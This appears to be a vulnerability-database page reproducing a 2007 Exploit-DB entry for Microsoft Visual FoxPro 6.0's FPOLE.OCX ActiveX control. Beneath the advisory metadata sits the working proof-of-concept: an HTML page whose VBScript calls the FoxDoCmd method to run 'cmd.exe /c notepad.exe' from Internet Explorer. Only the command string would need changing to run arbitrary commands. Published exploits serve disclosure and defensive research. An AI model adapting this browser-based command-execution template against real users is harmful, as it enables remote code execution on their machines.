Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution

vendor:

Microsoft Visual FoxPro 6.0

by:

shinnai

7.5

CVSS

HIGH

Arbitrary Command Execution

CWE

Product Name: Microsoft Visual FoxPro 6.0

Affected Version From: Microsoft Visual FoxPro 6.0

Affected Version To: Microsoft Visual FoxPro 6.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7

2007

Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution

The FPOLE.OCX file in Microsoft Visual FoxPro 6.0 allows remote attackers to execute arbitrary commands via the FoxDoCmd method, as demonstrated by running cmd.exe to execute notepad.exe.

Mitigation:

Apply the necessary patches or updates provided by Microsoft.

Source

Exploit-DB raw data:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
 <b>Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution</b>
 url: http://www.microsoft.com

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 <b><font color='red'>This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.</font></b>

 <b>Technical Details
 File: FPOLE.OCX
 Version: 6.0.8450.0
 MD5: E9A1D8CFE6C791BA76B7343FA39752FB
 
 Marked as:
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 IDisp Safe: Safe for untrusted: caller</b>

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 
 When I released this <a href='http://www.milw0rm.com/exploits/4369'>http://www.milw0rm.com/exploits/4369</a> I never thought
 it was possible to use the "FoxDoCmd()" method to run applications passed
 as argument but...
-----------------------------------------------------------------------------

<object classid='clsid:EF28418F-FFB2-11D0-861A-00A0C903A97F' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
  Sub tryMe
   test.FoxDoCmd "RUN cmd.exe /c notepad.exe", "Something"
  End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-10-09]